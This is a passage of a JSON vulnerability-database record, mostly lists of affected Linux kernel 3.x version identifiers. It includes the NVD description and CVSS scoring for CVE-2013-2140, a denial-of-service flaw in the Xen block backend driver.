"cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:50", "description": "The dispatch_discard_io function in drivers/block/xen-blkback/blkback.c in the Xen blkback implementation in the Linux kernel before 3.10.5 allows guest OS users to cause a denial of service (data loss) via filesystem write operations on a read-only disk that supports the (1) BLKIF_OP_DISCARD (aka discard or TRIM) or (2) SCSI UNMAP feature.", "edition": 6, "cvss3": {}, "published": "2013-09-25T10:31:00", "title": "CVE-2013-2140", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.8, "vectorString": "AV:A/AC:M/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2140"], "modified": "2014-01-04T04:46:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.10.0", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-2140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2140", "cvss": {"score": 3.8, "vector": "AV:A/AC:M/Au:S/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", 